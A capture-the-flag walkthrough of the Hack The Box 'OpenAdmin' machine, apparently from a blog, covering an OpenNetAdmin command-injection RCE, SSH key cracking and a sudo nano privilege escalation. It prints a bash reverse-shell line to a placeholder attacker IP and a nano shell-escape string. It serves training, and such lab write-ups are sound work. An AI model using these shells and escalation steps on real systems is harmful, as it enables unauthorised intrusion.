OpenAdmin is an easy difficulty machine running Linux. It tests your knowledge in OSINT, exploitation through a publicly known exploit and basic privilege escalation using a GTFOBin.
Be sure to checkout the Basic Setup section before you get started.
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
We have two open ports. SSH on port 22 and Apache on port 80 which we can see goes to the deault ubuntu It Works page.
Since that page seems like a dead end let’s check for any other directories that may be available:
Let’s take a look at each of the directories we have found.
We have http://openadmin.htb/artwork/ which is a business website for Arcwork:
Nothing seems to stand out at first glance and a quick view of the source reveals nothing interesting.
Navigating to http://openadmin.htb/sierra/ we see another business site called Sierra:
I am starting to think there is a theme here. Web hosting or design company?
Sierra also doesn’t show anything interesting on the site or within the source.
Taking a look at http://openadmin.htb/music/ we have another business site called SolMusic:
The first thing that catches our eye in comparison to the other sites is that this site has a Login link in the navbar.
The link takes us to http://openadmin.htb/ona/ where we come across this page:
Something that is interesting is the Newer Version Available alert that lists the version v18.1.1. Although there is no direct mention of what the web application is there is also a link to ` DOWNLOAD the latest version`.
The download link takes us to http://opennetadmin.com/download.html which is web application that keeps a database managed inventory of your IP network:
Looks like we have found our openadmin reference and most likely our way in!
Let’s checkout OpenNetAdmin and see if there are any vulnerabilities available for that version:
We find one RCE exploit. Let’s check it out and see what we have got:
Pretty straight forward. The script takes a url as an argument and then using curl with the -d option that sends HTTP POST data. That data is the injection and execution of arbitrary PHP code namingly Ping Command Injection.
Lets go ahead and copy the contents to a file called exploit.sh and see if we can get a shell:
And make the script executable:
Now all that’s left is to give it a run:
We gain a shell and have access as the www-data user of which will most likely have limited access. We will need to move to another user.
Before we go ahead and do that let’s try and gain a netcat connection so we can upgrade our shell. The nc we have access to doesn’t support the -e option so we will have to do some shell redirect magic.
First off we will set our netcat listener on our attacker machine:
We then run the following commands on the victim to receive our connection:
From here we can upgrade our shell taking note that the victim machine only has python3 installed.
Now we can see what other users we have and check their directory permissions while we are at it:
So we have two users to work with!
Because we are looking at taking over another account we will search for any information leakage like passwords, ssh keys and the likes as well as keeping an eye out for privesc to root. You just never know.
Having a look at OpenNetAdmin’s files it is obvious that the web application requires a database. A quick check shows that there is MySQL running:
A search of the interweb using the term opennetadmin database password reveals some info that might be of use here.
Let’s check out the file mentioned:
We find a password! Let’s give ssh a try and see if we get access:
On inspection of jimmy’s home folder we see that there is no user.txt file. This means we are going to neeed to gain access to joannas account.
Let’s see where jimmy has read and write access:
Taking a look at these files we see that index.php is a login page that seems to accept the username and password of jimmy and main.php has shell_exec('cat /home/joanna/.ssh/id_rsa'); which would output joanna’s SSH key. That is exactly what we are after. We also see Don't forget your "ninja" password. Don’t worry we won’t ;)
These files aren’t in http://openadmin.htb’s root folder. Maybe there is a vhost linking to this location that we haven’t found? Let’s check the apache config:
There it is! Taking a look at internal.conf we find what we are looking for:
We see that apache is listening on 127.0.0.1:52846 and a quick curl -u jimmy:n1....0R! 127.0.0.1:52846 outputs the contents of index.php.
Running main.php we see that joanna’s SSH key is printed:
Path 1 - SSH Key
Since we have joanna’s SSH key we can try cracking it. Copy the key to a file on the attacker machine such as id_rsa.
We will then convert the key to a crackable hash:
We can then try cracking it with john:
NOTE: I don’t use just rockyou.txt. The passwords.txt is a custom created wordlist made from multiple wordlists stripped of all duplicates. You may need to do the same!
We retrieve the SSH passphrase bl....as and can now login via SSH using the id_rsa key:
Path 2 - Alter Script
With this script we have command execution as joanna so all we have to do is grab a shell.
So we will edit main.php and replace cat /home/joanna/.ssh/id_rsa with /bin/bash -c 'bash -i >& /dev/tcp/<attacker-ip>/1234 0>&1'.
Then we setup our netcat listener on our attacker machine:
Now let’s try running main.php using jimmy’s username and password:
Back at our listener we should receive a connection:
Now we can go for our user flag:
And there we have it! We have our user.txt.
Let’s check to see if we have any sudo privileges.
If we used Path 2 and altered the script then we find that we receive the following error:
We can create an ssh key pair and throw the public key in /home/joanna/.ssh/authorized_keys then we can login via ssh.
We see that we can run nano with sudo and without a password to open the file /opt/priv. Since nano is a GTFOBin we will be able to gain root.
To do so we open our file with nano and then type CTRL+R and then CTRL+X to bring up the Command to execute prompt. We then type in reset; sh 1>&0 2>&0 like so:
That was a nice and easy root :)
This was an interesting machine that had a fair few websites that could have sent some people on a wild goose chase. Focusing on important links like logins can be fruitful. Misconfigurations and outdated software can easily lead to a compromise in the real world. The privilege escalation to root once again outlines the issue with “ease of use” methods such as using sudo without a password. Sadly this is a common realworld situation where people attempt to automate a task that involves a script needing escalated privileges.